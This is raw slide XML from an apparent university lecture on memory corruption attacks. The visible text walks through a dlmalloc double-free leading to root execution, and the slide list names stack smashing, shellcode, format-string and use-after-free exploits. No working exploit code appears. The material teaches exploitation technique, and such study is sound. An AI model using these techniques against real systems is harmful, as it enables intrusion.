              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF7DEAFE-0478-DE4A-A276-30AF2B07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After malloc() Has Been Called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48CC94-20AF-BD4E-AF83-5C57CAE94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343400"/>
            <a:ext cx="4495800" cy="685800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506B6F-30FD-FD4C-8E7E-2322C355B1C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4968876" y="4381500"/>
            <a:ext cx="746125" cy="304800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FE41A1-A28D-5542-927C-EE016E8DC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3676" y="4027557"/>
            <a:ext cx="2605200" cy="707886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After malloc, </a:t>
            </a:r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user data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will be written here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71688" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AD4E1B-E21F-9E4A-BD0E-85BB69980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1" y="1600201"/>
            <a:ext cx="207300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This chunk is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unlinked from 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free list… how?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71689" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A84502-FC08-294B-AF11-889A1BEBF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2979738"/>
            <a:ext cx="457200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50001"/>
            </a:avLst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27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allAtOnce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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548A771C-9B41-334F-92AB-BE6F8D215A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2074863"/>
            <a:ext cx="8229600" cy="3700462"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E5D1B0-E74F-EE43-8737-0AB94A44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After Another malloc()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A53C18-2A33-8B44-9636-65D994D1B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343400"/>
            <a:ext cx="4495800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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BF96B-847A-744A-8A26-D0EAB06C7B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2194" y="4075847"/>
            <a:ext cx="2597186" cy="132343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After another malloc, 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pointers will be read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from here as if it were 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a free chunk  (why?)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6B43AB-6439-AB4C-B66A-E33D629E5F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81600" y="4808538"/>
            <a:ext cx="533400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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712" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA600C6-E9F8-3F49-A8A3-C4F00CD4B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1" y="1547814"/>
            <a:ext cx="223170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Same chunk will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be returned…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(why?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72713" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94443CE5-0C18-4840-B155-52EC1CDF9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2979738"/>
            <a:ext cx="457200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50001"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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114690" name="Picture 2" descr="C:\Users\Dynamism\AppData\Local\Temp\Temporary Internet Files\Content.IE5\KLUPRTM6\MC900293216[1].wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037F7DCE-1830-5947-9A26-447179074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60946" y="3958351"/>
            <a:ext cx="1425854" cy="14107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0000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364AA1-108D-0546-95DF-14A88CB77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325" y="5638800"/>
            <a:ext cx="3911648" cy="707886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+mn-lt"/>
              </a:rPr>
              <a:t>One will be interpreted as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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+mn-lt"/>
              </a:rPr>
              <a:t>the other as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>value   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(why?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79976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build="allAtOnce" animBg="1"/>
      <p:bldP spid="13" grpId="0" build="allAtOnce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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647D3BEC-4C2A-3E4E-A4EE-9A4B7DDF40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Running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74442-5B7F-4149-AEDF-5A97C0E5D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324" y="2057401"/>
            <a:ext cx="4025777" cy="37397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E72B94B-0F9D-C148-A079-4E12BB77AD3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3752850" y="3600450"/>
            <a:ext cx="685800" cy="4000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0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424534" y="5184517"/>
            <a:ext cx="3967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program will run as root!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E50C4A-1FB2-0449-90F2-BD2123142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401" y="1478518"/>
            <a:ext cx="8094886" cy="34212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082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Speak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elawik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4428</TotalTime>
  <Words>4973</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>887</Paragraphs>
  <Slides>74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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Selawik Light</vt:lpstr>
      <vt:lpstr>Speak Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>SavonVTI</vt:lpstr>
      <vt:lpstr>MEMORY CORRUPTION ATTACKS  Vitaly Shmatikov</vt:lpstr>
      <vt:lpstr>The Morris Worm</vt:lpstr>
      <vt:lpstr>Famous Internet Worms</vt:lpstr>
      <vt:lpstr>And The Band Marches On</vt:lpstr>
      <vt:lpstr>EternalBlue</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Memory Exploits</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Executing Machine Code</vt:lpstr>
      <vt:lpstr>Executing Machine Code</vt:lpstr>
      <vt:lpstr>x86 Registers </vt:lpstr>
      <vt:lpstr>Executing Machine Code</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Stack Buffers</vt:lpstr>
      <vt:lpstr>Frame Layout</vt:lpstr>
      <vt:lpstr>Function Call in meet.c</vt:lpstr>
      <vt:lpstr>What If Buffer Is Overstuffed?</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Targets of Stack Smashing</vt:lpstr>
      <vt:lpstr>Control-Flow Hijacking</vt:lpstr>
      <vt:lpstr>Building an Exploit</vt:lpstr>
      <vt:lpstr>Building Shell Code</vt:lpstr>
      <vt:lpstr>Building Shell Code</vt:lpstr>
      <vt:lpstr>Building Shell Code</vt:lpstr>
      <vt:lpstr>Shell Code</vt:lpstr>
      <vt:lpstr>Crude Way to Get Stack Pointer</vt:lpstr>
      <vt:lpstr>NOP Sled</vt:lpstr>
      <vt:lpstr>Small Buffers</vt:lpstr>
      <vt:lpstr>Dealing with Small Buffers</vt:lpstr>
      <vt:lpstr>Dealing with Small Buffers</vt:lpstr>
      <vt:lpstr>Stack Corruption: General View</vt:lpstr>
      <vt:lpstr>Cause: No Range Checking</vt:lpstr>
      <vt:lpstr>Attack #1: Return Address</vt:lpstr>
      <vt:lpstr>Function Pointer Overflow</vt:lpstr>
      <vt:lpstr>Attack #2: Pointer Variables</vt:lpstr>
      <vt:lpstr>Off-By-One Overflow</vt:lpstr>
      <vt:lpstr>Attack #3: Frame Pointer</vt:lpstr>
      <vt:lpstr>Two’s Complement</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Another Integer Overflow</vt:lpstr>
      <vt:lpstr>Integer Overflow Exploit Stats</vt:lpstr>
      <vt:lpstr>Integer Overflow in EternalBlue</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Variable Arguments in C</vt:lpstr>
      <vt:lpstr>Implementation of Variable Args</vt:lpstr>
      <vt:lpstr>Frame with Variable Args</vt:lpstr>
      <vt:lpstr>Sloppy Use of Format Strings in C</vt:lpstr>
      <vt:lpstr>Writing the Stack with Format Strings</vt:lpstr>
      <vt:lpstr>Using %n to Write the Return Address</vt:lpstr>
      <vt:lpstr>Heap Overflow</vt:lpstr>
      <vt:lpstr>Function Pointers on the Heap</vt:lpstr>
      <vt:lpstr>Heap-Based Control Hijacking</vt:lpstr>
      <vt:lpstr>Dynamic Memory Management in C</vt:lpstr>
      <vt:lpstr>Memory Management Errors</vt:lpstr>
      <vt:lpstr>IE11 Example: CVE-2014-0282  (simplified)</vt:lpstr>
      <vt:lpstr>Use After Free</vt:lpstr>
      <vt:lpstr>What Just Happened?</vt:lpstr>
      <vt:lpstr>The Exploit</vt:lpstr>
      <vt:lpstr>Chrome Vulnerabilities (2015-2020)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Doug Lea’s Memory Allocator</vt:lpstr>
      <vt:lpstr>Free Chunks in dlmalloc</vt:lpstr>
      <vt:lpstr>Responding to Malloc</vt:lpstr>
      <vt:lpstr>The Unlink Macro</vt:lpstr>
      <vt:lpstr>Example of Unlink</vt:lpstr>
      <vt:lpstr>Double-Free Vulnerabilities</vt:lpstr>
      <vt:lpstr>Empty Bin and Allocated Chunk</vt:lpstr>
      <vt:lpstr>After First Call to free()</vt:lpstr>
      <vt:lpstr>After Second Call to free()</vt:lpstr>
      <vt:lpstr>After malloc() Has Been Called</vt:lpstr>
      <vt:lpstr>After Another malloc()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corruption attacks</dc:title>
  <dc:subject/>
  <dc:creator>Vitaly Shmatikov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vitaly Shmatikov</cp:lastModifiedBy>
  <cp:revision>551</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T21:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-15T19:18:35Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>